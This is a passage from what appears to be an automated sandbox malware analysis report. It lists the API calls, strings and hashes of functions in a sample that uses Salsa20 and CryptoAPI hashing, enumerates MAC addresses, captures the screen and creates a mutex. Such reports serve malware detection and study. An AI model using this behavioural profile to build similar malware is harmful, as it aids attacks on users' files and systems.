                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                        • String ID: failed with error
                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                        • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                        • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                        • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                        • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                          • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                                                        • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                        • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                        • Opcode ID: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                                                                                                                                        • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                        • Opcode Fuzzy Hash: fcdb3c65d237faf0aacdec3d6eb45a8278326906d3b88b2002ac43bdb553a6d9
                                                                                                                                        • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                        • _memset.LIBCMT ref: 0040E98E
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                        • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                        • String ID: %.2X
                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                        • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                        • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                        • String ID: %.2X
                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                          • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                          • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                          • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                          • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                          • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                        • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                        • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                        • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                        • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                        • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                        • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                        • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                        • _free.LIBCMT ref: 0040E6A4
                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                        • _free.LIBCMT ref: 0040E6C5
                                                                                                                                        • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                        • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                        • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                        • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                        • _free.LIBCMT ref: 0040E745
                                                                                                                                        Strings
                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                        • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                        • Opcode ID: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                                                                                                                                        • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                        • Opcode Fuzzy Hash: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
                                                                                                                                        • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                          • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                                                        • _memmove.LIBCMT ref: 00410427
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                                                        • _memmove.LIBCMT ref: 00410514
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                        • Opcode ID: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                                                                                                                                        • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                                                        • Opcode Fuzzy Hash: 2c535a9ce1b4a658066c3b574bdbe8b0733bbf1e4505cf72e2a34136cfdfc2a6
                                                                                                                                        • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                        • Opcode ID: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                                                                                                                                        • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                                                        • Opcode Fuzzy Hash: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                                                                                                                                        • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                        • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                        • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                        • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                        • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wassert
                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                        • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                        • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                        • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                        • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                        • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                        • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                                                                                                                        • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                        • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                        • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                        • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                                                                                                                        • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                        • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                        • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                        • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                                                                                                                        • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                        • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                        • GetLastError.KERNEL32 ref: 00412509
